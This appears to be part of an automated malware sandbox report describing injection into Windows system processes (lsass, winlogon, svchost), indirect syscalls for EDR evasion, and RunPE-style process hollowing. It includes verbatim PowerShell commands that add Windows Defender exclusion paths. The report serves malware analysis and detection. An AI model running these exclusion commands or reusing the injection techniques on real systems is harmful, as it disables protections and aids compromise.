Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B2C3E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	63_2_0000017CD5B2C3E8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B29104 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	63_2_0000017CD5B29104
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B8D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	63_2_0000017CD5B8D2A4
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B87D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	63_2_0000017CD5B87D90
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	66_2_0000023E07F47D90
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	66_2_0000023E07F4D2A4
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_00007FF62DC4118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	66_2_00007FF62DC4118B
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_00007FF62DC411D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	66_2_00007FF62DC411D8
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	68_2_000001A645EED2A4
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	68_2_000001A645EE7D90

Source: C:\Users\user\Desktop\F4R5fd8grr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.cs

.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size3, 12288u, 64u)
Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, size, IntPtr.Zero)
Source: 2.2.GR55Qg1hth.exe.1b632a2a9e0.3.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAEDA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108B950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166960000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E29D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 3160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64500000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CB55570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D8C0730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 240D6250000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 227F2E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1E71EBB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23E7F4D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 268D2E90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A220F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 112C58A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\Desktop\GR55Qg1hth.exe base: 1B630F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B240000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\Desktop\F4R5fd8grr.exe base: 2730000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E9A6600000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21CEA710000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1C25C740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sc.exe base: 17CD5980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 20FE3BB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe base: 23E07EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2E72A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1A645CD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 12762130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 29BB2510000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25AB6AE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 19216AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B3680000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B36E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 270D5B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 20717890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\schtasks.exe base: 162620F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0200000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0230000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 24C84EC0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 51_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

51_2_0000000140001C88

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 612D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AEDA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8799273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5377273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D53273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E86273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 473C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6F9D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D3F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A415273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 644B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2AB4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ADB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F535273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FFB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C257273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B95273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6696273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D57273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC74273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F389273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A653273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 29D0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F48273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E26273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D593273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC69273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7897273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6450273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4935273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E815273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5234273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5557273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C073273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D625273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F2E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1EBB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7F4D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D2E9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 20F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C58A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 30F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1B24273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A660273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EA71273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5C74273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\sc.exe EIP: D598273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: E3BB273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe EIP: 7EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EIP: E72A273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 45CD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6213273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B251273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B6AE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 16AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B368273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B36E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D5B5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1789273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 620F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F020273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F023273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 84EC273C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtResumeThread: Indirect: 0x276231E
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtEnumerateValueKey: Indirect: 0x276293D
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	NtWriteVirtualMemory: Direct from: 0x7FF650224A81	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	NtQuerySystemInformation: Indirect: 0x1B88205D	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtDeviceIoControlFile: Indirect: 0x2762B9D
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtEnumerateValueKey: Indirect: 0x276290E
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	NtQuerySystemInformation: Indirect: 0x1B882F57	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtEnumerateKey: Indirect: 0x2762842
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtEnumerateKey: Indirect: 0x2762875
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	NtEnumerateValueKey: Indirect: 0x1B88293D	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	NtQuerySystemInformation: Indirect: 0x276205D
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	NtEnumerateValueKey: Indirect: 0x1B88290E	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000 value starts with: 4D5A
